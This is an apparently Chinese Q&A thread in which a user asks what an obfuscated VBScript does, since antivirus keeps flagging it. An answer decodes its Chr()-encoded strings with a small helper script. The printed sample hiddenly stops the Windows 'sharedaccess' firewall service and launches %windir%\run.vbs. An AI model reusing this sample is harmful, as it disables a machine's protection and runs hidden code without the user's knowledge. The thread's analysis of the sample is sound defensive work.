ascii 码 VBS

来源:百度知道 编辑:UC知道 时间:2024/06/17 08:05:54
set shell = wscript.createobject (Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108))
shell.run Chr(110)+Chr(101)+Chr(116)+Chr(32)+Chr(115)+Chr(116)+Chr(111)+Chr(112)+Chr(32)+Chr(115)+Chr(104)+Chr(97)+Chr(114)+Chr(101)+Chr(100)+Chr(97)+Chr(99)+Chr(99)+Chr(101)+Chr(115)+Chr(115),Chr(48)
shell.run Chr(37)+Chr(119)+Chr(105)+Chr(110)+Chr(100)+Chr(105)+Chr(114)+Chr(37)+Chr(92)+Chr(114)+Chr(117)+Chr(110)+Chr(46)+Chr(118)+Chr(98)+Chr(115),Chr(48)

这个保存为*.VBS是有什么作用的!
我想问问前面的 一段代码是什么作用!杀毒软件常常报告有毒!就是删不掉

用这段程序就可以翻译啦:
SearchString = "Chr(87)+Chr(115)+Chr(99)+Chr(114)+Chr(105)+Chr(112)+Chr(116)+Chr(46)+Chr(115)+Chr(104)+Chr(101)+Chr(108)+Chr(108)" '要翻译的字符串

for i = 40 to 128
SearchChar = "Chr("&i&")"
SearchString = replace(SearchString,SearchChar,Chr(i))
next
msgbox SearchString
###############################################
帮你翻译了下,是:
set shell = wscript.createobject(wscript.shell)
shell.run "net stop sharedaccess",0
shell.run %windir%\run.vbs,0

.vbs是一种文件格式